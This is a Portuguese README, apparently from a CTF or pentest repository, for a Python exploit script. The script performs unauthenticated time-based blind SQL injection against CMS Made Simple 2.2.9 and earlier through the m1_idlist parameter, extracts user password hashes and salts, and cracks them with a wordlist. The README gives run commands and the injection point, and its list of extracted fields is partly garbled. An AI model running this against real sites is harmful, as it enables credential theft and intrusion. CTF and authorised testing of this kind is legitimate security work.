
Este exploit executa uma injeção SQL cega baseada em tempo não autenticada contra CMS Made Simple <= 2.2.9, permitindo a extração de:
Opcionalmente, ele pode quebrar a senha usando uma wordlist fornecida.
cmsms_sqli_py3.py – Script de exploit em Python 3.Python 3 (pré-instalado no Kali)
Módulo termcolor:
pip install termcolor
Wordlist para quebra de senha (opcional), ex.: /usr/share/wordlists/rockyou.txt
python3 cmsms_sqli_py3.py -u http://target-uri
python3 cmsms_sqli_py3.py -u http://target-uri --crack -w /path/to/wordlist.txt
Exemplo:
python3 cmsms_sqli_py3.py -u http://simplectf.thm/simple/ --crack -w /usr/share/wordlists/rockyou.txt
Executa injeção SQL cega baseada em tempo em:
moduleinterface.php?mact=News,m1_,default,0&m1_idlist=<payload>
Extrai dados caractere por caractere verificando atrasos na resposta.
Extrai:
cms_siteprefs)cms_users)cms_users)cms_users)Opcionalmente, tenta quebrar o hash extraído usando a wordlist e o salt fornecidos.
✅ Totalmente compatível com Python 3 (estável em fluxos de trabalho TryHackMe/HTB). ✅ Funciona perfeitamente dentro do seu ambiente virtual (venv). ✅ Usa saída colorida para acompanhamento claro do progresso.
Este exploit é apenas para fins educacionais. Não o utilize em sistemas que você não possua ou para os quais não tenha permissão explícita para testar.
Se você precisar de geração automática de relatórios das credenciais extraídas ou de geração de payloads de login automático para seu fluxo de trabalho de pentest, me avise.